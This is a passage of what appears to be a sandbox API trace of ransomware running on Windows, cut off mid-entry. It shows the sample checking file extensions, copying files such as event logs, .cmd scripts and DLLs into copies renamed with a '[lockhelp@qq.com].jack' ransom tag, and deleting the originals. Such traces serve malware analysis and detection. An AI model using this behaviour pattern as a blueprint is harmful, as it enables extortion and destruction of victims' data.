[0219.567] lstrlenW (lpString=".docx") returned 5 [0219.567] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0219.567] lstrlenW (lpString=".pdf") returned 4 [0219.567] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0219.567] lstrlenW (lpString=".xls") returned 4 [0219.567] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0219.567] lstrlenW (lpString=".xlsx") returned 5 [0219.567] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0219.567] lstrlenW (lpString=".ppt") returned 4 [0219.567] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0219.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0219.567] lstrlenW (lpString=".zip") returned 4 [0219.567] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0219.567] lstrlenW (lpString=".rar") returned 4 [0219.567] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0219.567] lstrlenW (lpString=".bz2") returned 4 [0219.567] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0219.567] lstrlenW (lpString=".7z") returned 3 [0219.567] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0219.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0219.567] lstrlenW (lpString=".dbf") returned 4 [0219.567] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0219.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0219.567] lstrlenW (lpString=".1cd") returned 4 [0219.567] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0219.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0219.567] lstrlenW (lpString=".jpg") returned 4 [0219.567] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0219.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0219.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0219.568] lstrlenW (lpString=".doc") returned 4 [0219.568] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0219.568] lstrlenW (lpString=".docx") returned 5 [0219.568] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0219.568] lstrlenW (lpString=".pdf") returned 4 [0219.568] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0219.568] lstrlenW (lpString=".xls") returned 4 [0219.568] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0219.568] lstrlenW (lpString=".xlsx") returned 5 [0219.568] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0219.568] lstrlenW (lpString=".ppt") returned 4 [0219.568] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0219.568] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0219.568] lstrlenW (lpString=".zip") returned 4 [0219.568] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0219.568] lstrlenW (lpString=".rar") returned 4 [0219.568] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0219.568] lstrlenW (lpString=".bz2") returned 4 [0219.568] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0219.568] lstrlenW (lpString=".7z") returned 3 [0219.568] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0219.568] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0219.568] lstrlenW (lpString=".dbf") returned 4 [0219.568] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0219.568] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0219.568] lstrlenW (lpString=".1cd") returned 4 [0219.568] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0219.568] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0219.568] lstrlenW (lpString=".jpg") returned 4 [0219.568] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0219.569] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0219.569] lstrlenW (lpString="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 72 [0219.569] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0219.569] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=1052672) returned 1 [0219.569] CloseHandle (hObject=0x3b8) returned 1 [0219.570] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx")) returned 0x20 [0219.570] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0219.570] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0219.570] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0219.570] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0219.570] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0219.571] GetLastError () returned 0x0 [0219.571] ReadFile (in: hFile=0x3b8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0xffff0, lpOverlapped=0x0) returned 1 [0219.832] WriteFile (in: hFile=0x3d4, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xffff0, lpOverlapped=0x0) returned 1 [0219.909] ReadFile (in: hFile=0x3b8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x1010, lpOverlapped=0x0) returned 1 [0222.593] WriteFile (hFile=0x3d4, lpBuffer=0x3dff020, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0) Thread: id = 18 os_tid = 0xac4 [0195.708] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x23ca9e0 [0195.708] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3f10048 [0195.709] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x23788a8 [0195.709] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x65aa00 [0195.709] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x23788c0 [0195.709] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x4117020 [0195.712] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378998 [0195.712] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2378998, Size=0x20) returned 0x236bcd8 [0195.712] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378998 [0195.712] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2378998, Size=0x20) returned 0x236b850 [0195.713] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0195.713] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0195.713] Wow64DisableWow64FsRedirection (in: OldValue=0x341ff50 | out: OldValue=0x341ff50*=0x0) returned 1 [0195.713] lstrlenW (lpString="kernel32.dll") returned 12 [0195.713] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236bcd8 | out: hHeap=0x5e0000) returned 1 [0195.713] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0195.713] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236b850 | out: hHeap=0x5e0000) returned 1 [0195.713] Sleep (dwMilliseconds=0x64) [0195.919] lstrcmpiW (lpString1=".cmd", lpString2=".jack") returned -1 [0195.919] lstrlenW (lpString="PartnerSetupComplete.cmd") returned 24 [0195.919] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0195.967] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=577) returned 1 [0195.967] CloseHandle (hObject=0x3ac) returned 1 [0195.967] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd")) returned 0x20 [0196.182] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.182] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0196.182] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.182] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.182] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0196.544] GetLastError () returned 0x0 [0196.544] ReadFile (in: hFile=0x3e4, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x241, lpOverlapped=0x0) returned 1 [0196.561] WriteFile (in: hFile=0x3f8, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x250, lpOverlapped=0x0) returned 1 [0196.562] ReadFile (in: hFile=0x3e4, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.563] WriteFile (in: hFile=0x3f8, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x104, lpOverlapped=0x0) returned 1 [0196.563] SetEndOfFile (hFile=0x3f8) returned 1 [0196.563] CloseHandle (hObject=0x3f8) returned 1 [0196.567] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.568] SetEndOfFile (hFile=0x3e4) returned 1 [0196.569] CloseHandle (hObject=0x3e4) returned 1 [0196.569] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0196.569] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd")) returned 1 [0196.569] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0196.569] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0196.569] lstrlenW (lpString=".doc") returned 4 [0196.570] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0196.570] lstrlenW (lpString=".docx") returned 5 [0196.570] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0196.570] lstrlenW (lpString=".pdf") returned 4 [0196.570] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0196.570] lstrlenW (lpString=".xls") returned 4 [0196.570] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0196.570] lstrlenW (lpString=".xlsx") returned 5 [0196.570] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0196.570] lstrlenW (lpString=".ppt") returned 4 [0196.570] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0196.570] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0196.570] lstrlenW (lpString=".zip") returned 4 [0196.570] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0196.570] lstrlenW (lpString=".rar") returned 4 [0196.570] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0196.570] lstrlenW (lpString=".bz2") returned 4 [0196.570] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0196.570] lstrlenW (lpString=".7z") returned 3 [0196.570] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0196.570] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0196.570] lstrlenW (lpString=".dbf") returned 4 [0196.570] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0196.570] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0196.570] lstrlenW (lpString=".1cd") returned 4 [0196.570] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0196.570] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0196.571] lstrlenW (lpString=".jpg") returned 4 [0196.571] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0196.571] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0196.571] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0196.571] lstrlenW (lpString=".doc") returned 4 [0196.571] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0196.571] lstrlenW (lpString=".docx") returned 5 [0196.571] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0196.571] lstrlenW (lpString=".pdf") returned 4 [0196.571] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0196.571] lstrlenW (lpString=".xls") returned 4 [0196.571] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0196.571] lstrlenW (lpString=".xlsx") returned 5 [0196.571] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0196.571] lstrlenW (lpString=".ppt") returned 4 [0196.571] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0196.571] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0196.571] lstrlenW (lpString=".zip") returned 4 [0196.571] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0196.571] lstrlenW (lpString=".rar") returned 4 [0196.571] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0196.571] lstrlenW (lpString=".bz2") returned 4 [0196.571] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0196.571] lstrlenW (lpString=".7z") returned 3 [0196.571] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0196.571] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0196.571] lstrlenW (lpString=".dbf") returned 4 [0196.572] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0196.572] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0196.572] lstrlenW (lpString=".1cd") returned 4 [0196.572] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0196.572] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0196.572] lstrlenW (lpString=".jpg") returned 4 [0196.572] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0196.572] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0196.572] lstrlenW (lpString="SetupResources.dll") returned 18 [0196.572] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.605] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=14168) returned 1 [0196.605] CloseHandle (hObject=0x3ec) returned 1 [0196.605] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll")) returned 0x80 [0196.605] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.605] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.606] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.606] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.606] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0196.606] GetLastError () returned 0x0 [0196.606] ReadFile (in: hFile=0x3ec, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x3758, lpOverlapped=0x0) returned 1 [0196.608] WriteFile (in: hFile=0x3e4, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x3760, lpOverlapped=0x0) returned 1 [0196.609] ReadFile (in: hFile=0x3ec, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.610] WriteFile (in: hFile=0x3e4, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0196.610] SetEndOfFile (hFile=0x3e4) returned 1 [0196.610] CloseHandle (hObject=0x3e4) returned 1 [0196.613] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.613] SetEndOfFile (hFile=0x3ec) returned 1 [0196.614] CloseHandle (hObject=0x3ec) returned 1 [0196.614] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.615] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll")) returned 1 [0196.615] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0196.615] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0196.615] lstrlenW (lpString=".doc") returned 4 [0196.615] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.615] lstrlenW (lpString=".docx") returned 5 [0196.615] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.615] lstrlenW (lpString=".pdf") returned 4 [0196.615] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.615] lstrlenW (lpString=".xls") returned 4 [0196.615] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.615] lstrlenW (lpString=".xlsx") returned 5 [0196.615] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.615] lstrlenW (lpString=".ppt") returned 4 [0196.615] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.616] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0196.616] lstrlenW (lpString=".zip") returned 4 [0196.616] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.616] lstrlenW (lpString=".rar") returned 4 [0196.616] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.616] lstrlenW (lpString=".bz2") returned 4 [0196.616] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.616] lstrlenW (lpString=".7z") returned 3 [0196.616] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.616] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0196.616] lstrlenW (lpString=".dbf") returned 4 [0196.616] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.616] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0196.616] lstrlenW (lpString=".1cd") returned 4 [0196.616] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.616] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0196.616] lstrlenW (lpString=".jpg") returned 4 [0196.616] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.616] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0196.616] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0196.616] lstrlenW (lpString=".doc") returned 4 [0196.616] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.616] lstrlenW (lpString=".docx") returned 5 [0196.616] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.616] lstrlenW (lpString=".pdf") returned 4 [0196.617] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.617] lstrlenW (lpString=".xls") returned 4 [0196.617] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.617] lstrlenW (lpString=".xlsx") returned 5 [0196.617] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.617] lstrlenW (lpString=".ppt") returned 4 [0196.617] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.617] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0196.617] lstrlenW (lpString=".zip") returned 4 [0196.617] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.617] lstrlenW (lpString=".rar") returned 4 [0196.617] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.617] lstrlenW (lpString=".bz2") returned 4 [0196.617] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.617] lstrlenW (lpString=".7z") returned 3 [0196.617] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.617] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0196.617] lstrlenW (lpString=".dbf") returned 4 [0196.617] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.617] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0196.617] lstrlenW (lpString=".1cd") returned 4 [0196.617] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.617] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0196.617] lstrlenW (lpString=".jpg") returned 4 [0196.617] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.618] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0196.618] lstrlenW (lpString="SetupResources.dll") returned 18 [0196.618] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.669] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=18264) returned 1 [0196.669] CloseHandle (hObject=0x3f0) returned 1 [0196.669] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll")) returned 0x80 [0196.669] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.669] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0xc0000000, 